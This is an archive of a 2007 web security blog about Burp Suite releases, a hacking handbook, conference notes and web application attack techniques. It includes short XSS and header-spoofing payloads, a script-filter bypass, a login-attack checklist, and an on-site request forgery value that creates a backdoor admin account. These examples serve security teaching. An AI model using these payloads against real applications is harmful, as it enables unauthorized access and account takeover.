Sunday, December 9, 2007

Burp Suite v1.1 released

I'm pleased to announce that the release version of Burp Suite v1.1 is now available. You can download the software and read about what is new here.

Thanks to everyone who downloaded the beta version and gave me their feedback - this was much appreciated. Burp should hopefully now work properly across the many kinds of usage scenarios and platforms that I'm unable to test myself.

Monday, November 26, 2007

The new burp beta

The beta version of the new release of Burp Suite is now available.
This is a major release, containing several new tools and features. Highlights include:
  • Improved analysis and rendering of HTTP requests and responses wherever they appear.
  • Burp Sequencer, a new tool for analysing session token randomness.
  • Burp Decoder, a new tool for performing manual and intelligent decoding and encoding of application data.
  • Burp Comparer, a new utility for performing a visual diff of any two data items.
  • Support for custom client certificates (in all tools) and custom server certificates in Burp Proxy.
  • Ability to follow 3xx redirects in Burp Intruder and Repeater attacks.
  • Improved interception and match-and-replace rules in Burp Proxy.
  • A fix for the Intruder payload positions bug affecting some Linux users.
  • A "lean mode", for users who prefer less functionality and a smaller resource footprint.
I'm aiming to complete the final release fairly shortly, so if you have any problems or bugs, please let me know as soon as possible, either via email or in the comments. The new release requires Java version 1.5 or later, so make sure you have the latest JRE installed.

Tuesday, November 6, 2007

Hacker's Handbook - online materials

A few people have emailed me asking where the online material promised in The Web Application Hacker's Handbook is. Apologies for the slight delay on that front. I have now posted almost everything to the location below, including answers to questions, source code, and the checklist of methodology tasks. The only thing not yet ready is the hacker's challenge, of which more in due course. The book's page on the Wiley web site will be updated shortly to point here:

Monday, October 22, 2007

Et Voilà!

It's long, it's turgid, and it'll keep you awake at night. You know what I'm talking about ...

Sunday, October 21, 2007

Introducing Burp Sequencer

This is a preview of a new addition to the Burp family of tools, which will be included in the next release of Burp Suite arriving later this year.

Burp Sequencer is a tool for evaluating the randomness of session tokens or other data. Think Stompy on steroids, with more tests, quantitative results, graphical reporting, and arbitrary sample sizes.

Burp Sequencer is easy to use. The first step is usually to locate a request within the target application which returns a session token somewhere in the response. You can do this using the "send to sequencer" option within any of the other Burp tools:


The request and response are displayed within Sequencer, allowing you to identify the location of the token you are interested in. Any cookies or form fields within the response are automatically parsed out for you to choose; alternatively, you can select an arbitrary position within the response where the token appears:

Once configured, Burp Sequencer begins acquiring tokens from the application by repeatedly issuing your request and extracting the relevant token from the application's responses:

As soon as 100 tokens have been captured, you can perform an analysis of the tokens, to get an initial rough indication of the quality of their randomness. Obviously, a larger sample size enables a more reliable analysis. The live capture continues until 20,000 tokens have been captured, which is sufficient to perform FIPS-compliant statistical tests.

If you have previously obtained a sample of tokens from the application (or from any other source) you can also load these manually into Burp Sequencer, to perform the same analysis on them:

Burp Sequencer can operate on any sample size between 100 and 20,000. The analysis mainly uses significance-based statistical tests in which the assumption that the tokens are random is tested by computing the probability of the observed results arising if this assumption is true. If the probability falls below a particular level (the "significance level") then the assumption is rejected and the anomalous data is judged to be non-random.
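As a hand-rolled illustration of that approach (my own sketch, not Sequencer's actual implementation): take the simplest possible property, the count of one-bits in the sample, compute the probability of the observed deviation arising if the bits really were random, and compare it with the chosen significance level:

```python
import math

def monobit_p_value(ones, n):
    """Two-sided p-value for observing `ones` one-bits among n bits,
    under the null hypothesis that each bit is a fair coin flip
    (normal approximation to the binomial)."""
    mean = n / 2.0
    sd = math.sqrt(n) / 2.0
    z = abs(ones - mean) / sd
    return math.erfc(z / math.sqrt(2))

# 10,100 ones in 20,000 bits: a mild skew, p is roughly 0.16, so the
# sample is NOT rejected at the 1% significance level...
print(monobit_p_value(10100, 20000) < 0.01)   # prints False
# ...whereas 12,000 ones is overwhelming evidence of bias.
print(monobit_p_value(12000, 20000) < 0.01)   # prints True
```

If the computed probability falls below the significance level, the randomness assumption is rejected for that test, exactly as described above.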

This approach allows Burp Sequencer to give an intuitive overall verdict regarding the quality of randomness of the sample. This summary shows the number of bits of effective entropy within the token for each level of significance:

To gain a deeper understanding of the properties of the sample, to identify the causes of any anomalies, and to assess the possibilities for token prediction, Burp Sequencer lets you drill down into the detail of each character- and bit-level test performed. The following screenshot shows the analysis of character distribution at each position within the token:

The following screenshot shows the results of the FIPS monobit test at each bit position within the token:
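The monobit criterion itself is simple to state. Here is a sketch applying the FIPS 140-1 pass bounds (a count of ones strictly between 9,654 and 10,346 over a 20,000-bit sample); as the screenshot indicates, a test of this kind is applied at each bit position across the captured tokens:

```python
def fips_monobit(bits):
    """FIPS 140-1 monobit test: over a sample of exactly 20,000 bits,
    the count of ones must lie strictly between 9,654 and 10,346 for
    the sample to pass."""
    if len(bits) != 20000:
        raise ValueError("the FIPS monobit test is defined over 20,000 bits")
    ones = sum(bits)
    return 9654 < ones < 10346

# A perfectly balanced sample passes; a constant stream fails.
print(fips_monobit([0, 1] * 10000))   # prints True
print(fips_monobit([1] * 20000))      # prints False
```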

There are several other useful functions and configuration options affecting how tokens are captured and processed. Hopefully, Burp Sequencer will prove to be a valuable weapon in the web application hacker's arsenal, and will enable more effective and easier assessment of session token randomness than is possible with other current tools.

Saturday, September 15, 2007

Intruder bugfix - nonstandard charsets

Just to placate the salivating hordes who accost me on a daily basis demanding to know when the next release of Burp will be available, here is some more evidence that I'm not bluffing and that work is actually well underway on the new release.

One annoying bug in Intruder is that the payload position marker doesn't work when the JRE is set to use certain unusual character sets. Instead of the § character, the payload marker appears as a red box or some other character altogether, which doesn't get recognised when you try to launch an attack. This affected Japanese users, some Linux users, and other subversives whose character set wasn't set to en-US:

Well, the good news is that this has been fixed in the next release. I'd be most grateful if anyone who experienced this problem could try it out and let me know whether it works for you. If this bug didn't affect you, don't bother with the download as it contains nothing else that differs from the current release version.

Wednesday, September 12, 2007

Hacker's Handbook - table of contents

[drum roll ...]

A mere six months after the first chapter was submitted, The Web Application Hacker's Handbook is now at the final stages of production, which is fortunate given that it will be in the shops in little over a month. I look forward to evenings not spent poring over galley pages looking for the next typesetting error.

Anyway, we now have a final table of contents for you to look at. It gives a fair idea of the subject matter covered - and how much of it there is!

Tuesday, September 11, 2007

Burp Suite feature requests - thank you

Thanks to everyone who responded to my request for suggestions. I've had over 100 messages in various forms, so there are plenty of ideas of what else to include. Here are just a few of the requests I will be aiming to incorporate (in addition to those I mentioned previously):

  • token analyser;

  • option for Intruder/Repeater to follow 3xx redirects;

  • back/forward buttons in Proxy history;

  • fixing the bug with the payload marker when some unusual character sets are used;

  • doing automated find/replace in the message body as well as headers.

Probably the most optimistic request was: "Can you write hooks into all common networking and SSL libraries to make a process use a proxy even if it is not configured to natively?" I already did this for WinINet. But sorry, Ollie, I doubt I'll have the energy to do all the others!

As well as all the good ideas for new features, I received many requests for things that are already there, including:

  • response interception;

  • function to search each request/response;

  • tree view of site being browsed;

  • saving of preferences;

  • NTLM authentication;

  • support for upstream proxy.

Plenty of people emailed me "Great tool, I use it every day, can you make it do X?", when X has been there since day one. May I respectfully suggest that anyone who is missing the above features should take a quick look at the help (or even just the options panels) to find what they are looking for!

Wednesday, August 15, 2007

Browser bugs vs. attacks on same origin policy

A bar-room conversation with a colleague at Black Hat led me to think about this question, and here are my thoughts, for what they're worth.

Today's browsers are full of 0day, particularly in the processing of images and other media, and in plug-ins like ActiveX controls. At the same time, a thriving area of current research is focused on attacks against the browser same origin policy, involving JSON hijacking, DNS rebinding, and other workarounds and logic flaws. Which of these areas is more worthy of our attention?

Here are two polarised (and somewhat caricatured) opinions:

  • If I want to compromise a web user, I can just find a browser 0day and completely own them. Attacks against the same origin policy are lame and unnecessary.
  • I agree we can't ignore browser bugs if we're trying to protect web apps. We need to find defences in the application that can stand up to a compromised browser.
Of these two positions, the second is the easiest to shoot down. Aside from a narrow subset of browser bugs, no defences in the application can protect against a compromised browser. If an attacker can execute arbitrary machine-level code within a user's browser, then they completely own that user's interaction with any web application.
Does that mean we must accept the first position? There are several reasons why not:
  • Many would-be attackers are not capable of discovering and exploiting a browser 0day, but can understand and deliver attacks against the same origin policy. Defences that frustrate only some attackers are still worthwhile.
  • Attacks against the same origin policy make interesting research. Most security researchers are interested in class breaks and new genres of attacks, rather than individual bugs. The types of vulnerabilities that exist within browsers, and the ways they can be discovered, are more interesting than the latest bug in an image parser. Similarly, generic ways of circumventing the same origin policy are more interesting than the latest means of inducing network timeouts to port scan other domains.
  • This area of web security is a weakest link problem, in that an attacker needs to find either a browser bug or a same origin policy bypass to compromise a user. Conventional defence-in-depth does not apply - a robust same origin policy can still be defeated through a bug in the browser, and vice versa. This means that protecting users entails resolving both problem areas. Browser vendors are taking security seriously, and bugs are going to get progressively harder to find and exploit. Meanwhile, research into attacking and defending same origin restrictions needs to continue, so that this is not left as the weak link when browsers become more resilient.

Thursday, August 9, 2007

Black Hat retrospective

My mind and body are now partly recovered from the madness that is Vegas, and I've pieced together as many recollections as I'm able to.

First off, the webappsec training went really well, with some great feedback from the ~70 participants, and the customary job offer made to the CTF winner. It's pretty hard work standing up and talking for four days, but I met some great people and got lots of good ideas to make the course even better next time.

Once the training and jet lag were out of the way, the partying ratcheted up a few notches, and we saw plenty of the nocturnal delights that Vegas has to offer. As well as Caesars, we spent a fair bit of time at Luxor, Venetian and other hotels.

shadow bar

The WASC/OWASP party in the Shadow Bar was great, with much of the webappsec world in attendance, and an opportunity to meet people face to face whom I'd previously only corresponded with.

The Microsoft party took over the top floor of Pure, and drew a wider crowd, with seemingly half of the con getting an invitation, or maybe I was just seeing double by that point.

I also staggered into the iDefense party, and even blagged a VIP wristband, as did several others to the bemusement of some senior iDefense folks who wanted to talk about our contributions to the vulnerability programme. The Hard Rock cafe is a cool venue, although I don't think the crew of assembled geeks did it full justice.

Unsurprisingly, with all of the opportunities for imbibition, our attendance at the actual conference was patchy during the mornings. I was sorry to miss a few good talks, but I have the slides and was able to catch up with many interesting people during the evenings.

RSnake and PortSwigger

I made it to Billy Hoffman's Ajax talk, which was entertaining as usual but didn't contain anything new for me.

I also caught Joanna's update on virtualisation-based rootkits, and her attempts to avoid detection. Like most areas of security, this is an asymmetric problem - while she is sticking her fingers in as many dykes as she can, people only need to find one hole that can't be plugged. As far as detecting some kind of unexpected virtualisation goes, it appears that timing attacks in particular aren't going to go away any time soon.

Defcon provided some early excitement with this year's badge. J-Lo and I spent the first few minutes struggling through our hangovers figuring out how to reprogram them to make rude words appear.

defcon badge

The Defcon talks were a bit more offbeat, and I caught ones on malicious toasters, video games and various rants. In general, I thought the more mainstream technical talks were a bit disappointing - fairly introductory, with little in the way of new ideas. There is definitely room for some easy talks for people who are unfamiliar with a particular area, but it would be good to know in advance what is "for dummies" and what is more innovative.

All in all, it was a fantastic week, but it's good to be home. Vegas messes you up, physically and mentally. I'm nearly back to normal now. It will be great to go back next year.

Tuesday, July 24, 2007

Black Hat pre-spective

With less than a week to go, Vegas is beckoning and it's time to stock up on sun screen and pain killers.

My first four days will be mainly taken up presenting the Web Application (In)security course. In a last-minute addition to the line-up, I'll be joined by minor celebrity Wade Alcorn, the king of BeEF and author of various cool techniques for inter-protocol communication and exploitation. It's going to be well-attended - more than 60 delegates have registered so far.

After four days standing up, it's likely that Tuesday won't be the smallest night of the year. Hopefully it won't run all the way into Wednesday, as I'd like to make David Byrne's talk on anti-DNS pinning, followed by Jer and RSnake updating us on intranet hacking via the browser. In the afternoon, I'll try to make the Premature Ajaxulation talk, for the name if nothing else. It clashes with Lindsay's kernel 0days, but I've had a preview of those already.

I'll certainly be near the front of the queue for the WASC/OWASP cocktail party, and then all of the other ones after that.

On Thursday morning, it would be nice to catch John's latest on rootkits, but I might settle for a beer-assisted precis later on. Billy Hoffman's take on web worms should be good, given his past form. Later on, I'll try to make Alex Sotirov's talk on heap feng shui, which I'm afraid was a hangover casualty in Amsterdam.

With so much going on, there will be a major requirement for frequent relaxation, and I'll look forward to catching up with plenty of people for beers, both at BH and Defcon afterwards.

Monday, July 23, 2007

Hacking without credentials

It is common to be faced with a web application where you have no credentials to log in. Very often, the application contains a wealth of functionality that can be accessed without authentication and which you can start working on to find a way in. Typically, the most promising initial targets are the more peripheral functions supporting the authentication logic, like user registration, password change and account recovery.

But occasionally you will face a narrower challenge. Suppose the web root of the server returns a simple login form, with no other functions and no links anywhere else. You can try to guess a username and password, but is that all?

Here are just a few of the things to think about in this restricted situation:

  • Looking for names, email addresses and other information in the HTML source.

  • Fingerprinting the web server software, application platform and any other identifiable technologies in use, and researching these for vulnerabilities.

  • Enumerating the content that is currently hidden, by brute forcing file and directory names, running Nikto, etc., and checking whether the content discovered is properly access controlled.

  • Checking search engines and Internet archives for references to the target.

  • Tampering with any hidden parameters and cookies in the login request that may affect server-side logic.

  • Checking for any disabled form elements that may still be processed if you re-enable them.

  • Adding common debug parameters (like test=true) to your request.

  • Inspecting the ASP.NET ViewState (if present).

  • Testing for username enumeration via informative failed login messages or other differences.

  • Testing susceptibility to brute force attacks.

  • If the application issues session tokens prior to login, testing these for predictability.

  • Testing all request parameters and headers for common code-level flaws like SQL injection, XSS, script inclusion, etc.

  • Probing for logic flaws within the login function, by omitting parameters, interfering with the request sequence if multi-stage, etc.

  • If the application is hosted in a shared environment, looking for co-hosted applications that you may be able to leverage to attack your target.

Any one of these attacks might give you a sufficient foot in the door to get past the login and into the protected functionality behind it. If they do not, then the login mechanism is a lot more robust than most are, and it is probably time to try to get hold of credentials, or move on to another target.
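To illustrate just one item from the list, brute forcing hidden content boils down to requesting candidate names and noting which ones don't come back 404. A minimal sketch (the wordlist and the fetch callback here are hypothetical placeholders; a real run would use a tool like Nikto or a proper wordlist):

```python
# Hypothetical mini-wordlist for illustration only.
COMMON_NAMES = ["admin", "backup", "test", "old", "login.bak"]

def discover_content(base_url, fetch_status, names=COMMON_NAMES):
    """Request each candidate path and keep those that do not return 404.
    fetch_status is any callable mapping a URL to an HTTP status code."""
    found = []
    for name in names:
        status = fetch_status(base_url.rstrip("/") + "/" + name)
        if status != 404:
            found.append(name)
    return found

# Demo against a stubbed server that only knows about /backup:
statuses = {"http://target/backup": 200}
print(discover_content("http://target", lambda url: statuses.get(url, 404)))
# prints ['backup']
```

Anything discovered this way should then be checked for proper access control, as noted above.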

Friday, July 13, 2007

All your header are belong to us

First there came XMLHttpRequest, and then came Flash. This week, Alex released some great research demonstrating a new technique for spoofing browser HTTP headers.

The original problem with Flash was that it could be used to spoof any HTTP header within the browser of a user who invoked the Flash object. The fix that was applied to Flash did not make the problem go away altogether. It prevented Flash being used to spoof certain built-in browser headers, such as Referer and User-Agent. However, if a vulnerable page echoes the contents of all the headers that it received (as often happens in diagnostic error messages), then Flash is still a viable delivery mechanism for a reflected XSS attack.

What Alex has noticed is that many programming languages use underscores instead of hyphens when naming a header whose value they wish to access. For example, in PHP the following will retrieve the value of the User-Agent header:


$ua = $_SERVER['HTTP_USER_AGENT'];

Predictably enough, a Flash object can be used to spoof a header containing the non-standard name:

req.addRequestHeader("User_Agent", "<script>alert('xss')</script>");

This is not blocked by the fix to the original problem, and yet in many languages (most notably PHP, Perl, Ruby and ColdFusion) the application will process the attacker's payload instead of the browser's built-in header. Very nice.
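The reason the underscored name works is the CGI-style mangling these platforms apply to header names before exposing them to application code. A sketch of the mapping (exact behaviour varies by platform, but PHP's $_SERVER keys follow this pattern):

```python
def cgi_env_key(header_name):
    """CGI-style header-to-variable mapping: uppercase the name,
    replace hyphens with underscores, and prefix with HTTP_."""
    return "HTTP_" + header_name.upper().replace("-", "_")

# The browser's genuine header and the spoofable one collide on the
# same key, so the attacker-controlled value may be the one the
# application reads:
print(cgi_env_key("User-Agent"))   # prints HTTP_USER_AGENT
print(cgi_env_key("User_Agent"))   # prints HTTP_USER_AGENT
```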

Alex also discusses some other attacks, which are well worth a read.

There is an important lesson in all of this, beyond the detail of the actual attack. The subject of request header spoofing arises in all kinds of situations, including XSS, XSRF and DNS pinning. Some people do not realise there is a problem at all, and many others think it has gone away through fixes to Flash and other client-side technologies. Even if the new hole is ultimately plugged, I'd bet that another one will be found soon enough. But regardless of that, we should in general make the working assumption that a malicious web site can spoof any request header of a user who accesses that site. If your application contains XSS when echoing request headers, then fix the bug. If your application trusts request headers when defending against other attacks, then find a more robust defence, before someone else finds a way to bypass it.

Tuesday, July 10, 2007

DNS pinning and web proxies

DNS-based attacks against browsers have been known about for years. These attacks have received increased attention recently, following the discovery of defects within browser-based DNS pinning defences.

So far, discussion has focused on browser issues. However, the same attacks can also be performed against web proxies. Browser-based DNS pinning does not apply when a web proxy is being used, because the DNS look-ups occur on the proxy, not the browser. Hence, even if DNS-based attacks are completely addressed within browsers, the problem is not going to go away altogether.

The most significant opportunities for DNS-based attacks are against web users on internal corporate networks, as a means of gaining unauthorised access to sensitive information and web applications on internal intranets. Given that a large proportion of these users access the Internet via a proxy server, attacks against web proxies may represent at least as significant a threat as those against browsers.

I've written a short paper which explains the problem, examines possible software-based solutions, and describes the defences that organisations and individuals can use to prevent attacks against them. In summary:
  • DNS-based attacks affect web proxies as well as browsers.

  • Today's proxies are vulnerable.

  • The problem is not straightforward to fix in software.

  • You can protect your own infrastructure against these attacks.

Wednesday, July 4, 2007

Book review: Cross Site Scripting Attacks

I just read XSS Attacks by Jeremiah Grossman, Robert Hansen, Anton Rager, Petko Petkov and Seth Fogie. The book is a comprehensive analysis of XSS and related vulnerabilities, and covers everything from a beginner's introduction to XSS through to advanced exploitation and the latest attack techniques.

Overall, the book is well-organised, technically accurate, and full of pertinent examples and code extracts to illustrate the different vulnerabilities and attacks being described. There are plenty of tricks that will benefit even experienced web app hackers, including a wealth of filter bypasses, and coverage of offbeat topics such as injection into style sheets and use of non-standard content encoding.

There is strong coverage of recent research including JavaScript-based port scanning, history stealing and JSON hijacking, as you would expect given that these techniques were largely pioneered by some of the authors. All of their explanations are clear and precise, and contain sufficient detail for you to fully understand each issue and put together working code to exploit it. The book also covers the use of non-standard vehicles such as Flash and PDF for delivery of XSS attacks.

Here and there, the book displays the effects of multiple authorship, notably in the discussion of the best tools for finding XSS flaws. I know that some of the authors have rather opposing views on that question, but it is always good to get different people's perspectives on the tools they find most useful. There are also a few typos and editorial glitches, but that is the price you pay for being quick to market, as they evidently are.

Overall, this is a great book that will benefit a wide range of people, from novices to seasoned hackers. It is fun to read, with plenty of lighter moments punctuating the technical meat. Nothing else currently available is hitting this target - get it while it's hot!

Monday, July 2, 2007

Lame bugs for a rainy day

Most web applications contain enough serious security defects to produce an impressive pen test report, demonstrate a job well done, and (implicitly) justify your fee. In this situation, it is easy to overlook, or fail to report, a wide range of less exciting vulnerabilities that do not provide a direct means of compromising the application.

Just occasionally, you encounter an application which is so nailed down that you can find little bad to say about it. I think I even remember one app that didn't have any XSS, but I may be wrong. Even here, there are usually a bunch of "lame" issues you can identify, to at least demonstrate your attention to detail. Some common examples include:

  • names and email addresses appearing in HTML comments;

  • overly liberal cookie scope;

  • autocomplete enabled;

  • failure to time out user sessions;

  • broken logout functions;

  • informative error messages;

  • sensitive information transmitted in the query string;

  • session fixation;

  • directory listings;

  • caching of sensitive data;

  • arbitrary redirection.

Why do we think these bugs are lame? Presumably, because you cannot normally exploit them to do anything seriously malicious against your target. But this thought overlooks the possibility of chaining multiple low-risk flaws together. Very often, vulnerabilities that present no threat in isolation can, in skilled hands, be leveraged to completely compromise an application. RSnake's entertaining Death By A Thousand Cuts provides a classic example of this. If we are doing our jobs properly, we should be reporting all of these issues any time they arise, regardless of whether it is raining.

Friday, June 22, 2007

Burp Suite - feature requests please

Now that the manuscript for The Web Application Hacker's Handbook is out of the way, I'll have some proper time to think about the next release of Burp Suite. This will be a major upgrade with lots of new features in all of the tools, including:

  • Improved rendering and analysis of HTTP messages wherever they appear [preview].

  • Function to do a compare/diff between any set of requests and responses.

  • Versatile decoder/encoder with intelligence to detect encoding types and do recursive decoding.

  • Support for client SSL certificates.

  • New payload generators in Intruder.

At this point, it would be good to hear any other feature requests that people have, however large or small. Please leave them in the comments and I'll address as many as I can.

Sunday, June 17, 2007

Web application security training - Black Hat USA

After our success in Amsterdam, Marcus and I are taking the show on the road and will be presenting the Web Application (In)security course at Vegas in July. The course covers practical techniques for attacking web applications, from the most basic hacks through to advanced exploitation methods. It is a roughly equal mix of presentations and hands-on lab sessions. Some highlights include:

  • exploiting SQL injection using second-order attacks, filter bypasses, query chaining and fully blind exploitation;

  • breaking authentication and access control mechanisms;

  • reverse engineering ActiveX and Java applets to bypass client-side controls;

  • exploiting cross-site scripting to log keystrokes, port scan the victim’s computer and network, and execute custom payloads;

  • exploiting LDAP and command injection; and

  • uncovering common logic flaws found in web applications.

We have a pretty large crowd already, but there is still time to register. If you are there but not on the course, let me know and we can catch up for a beer.

Wednesday, June 13, 2007

ViewState snooping

I've been taking a look at the ASP.NET ViewState recently, and have done a (rather unscientific) survey of the way it is currently used on Internet-facing web applications. Here are a few statistics, based on a sample of more than 10,000 applications:

  • version 1.1 - 54%

  • version 2.0 - 46%

  • MAC-enabled (v1.1) - 93%

  • MAC-enabled (v2.0) - 89%

  • encrypted - 4%

  • average size - 16.8Kb

The largest ViewState I discovered was a whopping 3.8Mb in size, which appeared in a government web application displaying tables of statistics. Given that the ViewState is posted back to the server with each request, this application is seriously sluggish to use, even with a relatively fast connection.

I was surprised at the number of applications not using the EnableViewStateMac option, given that this is now set by default in ASP.NET. Without this option, the contents of the ViewState can be modified by the user, potentially affecting the application's processing in nefarious ways.

Even with EnableViewStateMac set, users can still decode and read the contents of the ViewState if it has not been encrypted. Application developers may use the ViewState to store arbitrary data, beyond the default serialisation of UI controls. I wonder how many attackers bother to decode and inspect the ViewState to check whether it contains anything of interest. The next version of Burp Suite will include a utility to deserialise and render the ViewState contents, to make this task trivial. A sneak preview is shown below:
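Short of a proper deserialiser, a crude first pass at ViewState snooping needs nothing more than a Base64 decode and a scan for readable strings. A rough sketch (this recovers printable fragments only, and makes no attempt to parse the actual serialisation format):

```python
import base64
import string

# Printable ASCII, excluding control whitespace.
PRINTABLE = set(string.ascii_letters + string.digits + string.punctuation + " ")

def viewstate_strings(viewstate_b64, min_len=4):
    """Base64-decode a ViewState field and return runs of printable
    ASCII - a quick way to spot interesting data in an unencrypted
    (even if MAC-protected) ViewState."""
    raw = base64.b64decode(viewstate_b64)
    runs, current = [], []
    for byte in raw:
        ch = chr(byte)
        if ch in PRINTABLE:
            current.append(ch)
        else:
            if len(current) >= min_len:
                runs.append("".join(current))
            current = []
    if len(current) >= min_len:
        runs.append("".join(current))
    return runs

# Demo against a made-up binary blob rather than a real ViewState:
blob = base64.b64encode(b"\xff\x01\x00DiscountCode=STAFF50\x00\x02").decode()
print(viewstate_strings(blob))   # prints ['DiscountCode=STAFF50']
```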

Tuesday, May 22, 2007

Barriers to automation 1 - vulnerability scanners

When you are attacking a web application, automation is your friend. Not only if you are lazy, but also because automation can make your attacks faster, more reliable and more effective. This is the first in a series of posts exploring ways of using automation in web application testing, and the limitations that exist on its effective use.

Web application vulnerability scanners seek to automate many of the tasks involved in attacking an application, from initial mapping through to probing for common vulnerabilities. I've used several of the available products, and they do a decent job of carrying out these tasks. But even the best current scanners do not detect all or even a majority of the vulnerabilities in a typical application.

Scanners are effective at detecting vulnerabilities which have a standard signature. The scanner works by sending a crafted request designed to trigger that signature if the vulnerability is present. It then reviews the response to determine whether it contains the signature; if so, the scanner reports the vulnerability.

Plenty of important bugs can be detected in this way with a degree of reliability, for example:

  • In some SQL injection flaws, sending a standard attack string will result in a database error message.

  • In some reflected XSS vulnerabilities, a submitted string containing HTML mark-up will be copied unmodified into the application's response.

  • In some command injection vulnerabilities, sending crafted input will result in a time delay before the application responds.
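The response-matching half of that loop is little more than string matching against a signature list. A toy sketch (these signatures are a few well-known database error fragments; a real scanner's list runs to hundreds of entries):

```python
# A tiny, illustrative signature list - real scanners carry far more.
SQL_ERROR_SIGNATURES = [
    "you have an error in your sql syntax",   # MySQL
    "unclosed quotation mark",                # MS SQL Server
    "ora-01756",                              # Oracle
]

def flag_sql_error(response_body):
    """Report a candidate SQL injection flaw if the response contains
    a known database error signature."""
    body = response_body.lower()
    return any(sig in body for sig in SQL_ERROR_SIGNATURES)

print(flag_sql_error("Warning: You have an error in your SQL syntax near ''"))
# prints True
print(flag_sql_error("<html>Thanks for your order</html>"))
# prints False
```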

However, not every vulnerability in the above categories will be detected using standard signature-based checks. Further, there are many categories of vulnerability which cannot be probed for in this manner, and which today's scanners are not able to detect in an automated way. These limitations arise from various inherent barriers to automation that affect computers in general:

  • Computers only process syntax. Scanners are effective at recognising syntactic items like HTTP status codes and standard error messages. However, they do not have any semantic understanding of the content they process, nor are they able to make any normative judgments about it. For example, a function to update a shopping cart may involve submitting various parameters. A scanner is not able to understand that one of these parameters represents a quantity and that another represents a price. Nor, therefore, is it able to assess that being able to modify the quantity is insignificant, while being able to modify the price indicates a security flaw.

  • Computers do not improvise. Many web applications implement rudimentary defences against common attacks, which can be circumvented by an attacker. For example, an anti-XSS filter may strip the expression <script> from user input; however, the filter can be bypassed by using the expression <scr<script>ipt>. A human attacker will quickly understand what validation is being performed and (presumably) identify the bypass. However, a scanner which simply submits standard attack strings and monitors responses for signatures will miss the vulnerability.

  • Computers are not intuitive. When a human being is attacking a web application, they often have a sense that something doesn't "feel right" in a particular function, leading them to probe carefully how it handles all kinds of unexpected input: modifying several parameters at once, removing individual parameters, accessing the function's steps out of sequence, and so on. Many significant bugs can only be detected through these kinds of actions. However, for an automated scanner to detect them, it would need to perform these checks against every function of the application, and every sequence of requests. Taking this approach would increase exponentially the number of requests which the scanner needs to issue, making it practically infeasible.
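The filter bypass in the second point is easy to demonstrate. Here is a sketch of such a rudimentary defence (hypothetical code, not taken from any real application):

```python
def naive_xss_filter(value: str) -> str:
    # Strips the literal expression <script> from user input -- the kind of
    # rudimentary defence described above
    return value.replace("<script>", "")

# A stock attack string is neutralised, so a scanner sees no signature:
print(naive_xss_filter("<script>alert(1)</script>"))   # alert(1)</script>
# A crafted string survives: stripping the inner <script> stitches the
# outer fragments back together into a working tag
print(naive_xss_filter("<scr<script>ipt>alert(1)"))    # <script>alert(1)
```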

The barriers to automation described above will only really be addressed through the incorporation of full artificial intelligence capabilities into vulnerability scanners. In the meantime, these barriers entail that many important categories of vulnerability cannot be reliably detected by today's automated scanners, for example:

  • Logic flaws, for instance where an attacker can bypass one step of a multi-stage login process by proceeding directly to the next step and manually setting the necessary request parameters. Even if a scanner performs the requests necessary to do this, it cannot interpret the non-standard navigation path as a security flaw, because it does not understand the significance of the content returned at each stage.

  • Broken access controls, in which an attacker can access other users' data by modifying the value of an identifier in a request parameter. Because a scanner does not understand the role played by the parameter, or the meaning of the different content which is received when this is modified, it cannot diagnose the vulnerability.

  • Information leakage, in which poorly designed functionality discloses listings of session tokens or other sensitive items. A scanner cannot distinguish between these listings and any other normal content.

  • Design weaknesses in specific functions, such as weak password quality rules, or easily guessable forgotten password challenges.

Further, even amongst the types of vulnerability that scanners are able to detect, such as SQL injection and XSS, there are many instances of these flaws which scanners do not identify, because they can only be exploited by modifying several parameters at once, or by using crafted input to beat defective input validation, or by exploiting several different pieces of observed behaviour which together make the application vulnerable to attack.

Current scanners implement manual workarounds to help them identify some of the vulnerabilities that are inherently problematic for them. For example, some scanners can be configured with multiple sets of credentials for accounts with different types of access. They will attempt to access all of the discovered functionality within each user context, to identify what segregation of access is actually implemented. However, this still requires an intelligent user to review the results, and determine whether the actual segregation of access is in line with the application's requirements for access control.
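That multi-credential workaround amounts to something like the following sketch. The helper names are mine, and `fetch` again stands in for the scanner's HTTP layer:

```python
def segregation_report(fetch, urls, sessions):
    # For each discovered URL, fetch it within every user context and note
    # whether all contexts receive identical content. A True entry means no
    # segregation was observed -- but only a human reviewer can say whether
    # that resource was supposed to be restricted in the first place.
    report = {}
    for url in urls:
        bodies = {name: token_body
                  for name, token in sessions.items()
                  for token_body in [fetch(url, token)]}
        report[url] = len(set(bodies.values())) == 1
    return report
```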

Automated scanners are often useful as a means of discovering some of an application's vulnerabilities quickly, and of obtaining an overview of its content and functionality. However, no serious security tester should be willing to rely solely upon the results of a scanner. Many of the defects which scanners are inherently unable to detect can be classified as "low hanging fruit" - that is, capable of being discovered and exploited by a human attacker with modest skills. Receiving a clean bill of health from today's scanners provides no assurance that an application does not contain many important vulnerabilities in this category.

Thursday, May 3, 2007

On-site request forgery

Request forgery is a familiar attack payload for exploiting stored XSS vulnerabilities. In the MySpace worm, Samy placed a script within his profile which caused any user viewing the profile to perform various unwitting actions, including adding Samy as a friend and copying his script into their own profile. In many XSS scenarios, when you simply wish to perform a particular action with different privileges, on-site request forgery is easier and more reliable than attempting to hijack a victim’s session.

What is less well appreciated is that stored on-site request forgery bugs can exist when XSS is not possible. Consider a message board application which lets users submit items that are viewed by other users. Messages are submitted using a request like the following:

POST /submit.php
Content-Length: 34

type=question&name=daf&message=foo
which results in the following being added to the messages page:

  <td><img src="/images/question.gif"></td>

In this situation, you would of course test for XSS. However, it turns out that the application is properly HTML-encoding any ", < and > characters which it inserts into the page. Having satisfied yourself that this defence cannot be bypassed in any way, you might move on to the next test.

But look again. We control part of the target of the <img> tag. Although we can’t break out of the quoted string, we can modify the URL to cause any user who views our message to make an arbitrary on-site GET request. For example, submitting the following value in the type parameter will cause anyone viewing our message to make a request which attempts to add a new administrative user:

../admin/newUser.php?username=daf2&password=0wned&role=admin#

When an ordinary user is induced to issue our crafted request, it will of course fail. But when an administrator views our message, our backdoor account gets created. We have performed a successful on-site request forgery attack even though XSS is not possible. And of course, the attack will succeed even if administrators take the precaution of disabling JavaScript.

(In the above attack string, note the # character which effectively terminates the URL before the .gif suffix. We could just as easily use & to incorporate the suffix as a further request parameter.)
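You can verify how a browser ends up resolving that src value using nothing more than standard URL handling (the host name here is made up):

```python
from urllib.parse import urljoin, urlsplit

# The application builds the image URL as "/images/" + type + ".gif"
crafted_type = "../admin/newUser.php?username=daf2&password=0wned&role=admin#"
src = "/images/" + crafted_type + ".gif"

# Resolve it the way a browser would, then pull the pieces apart
parts = urlsplit(urljoin("http://vuln-app/", src))
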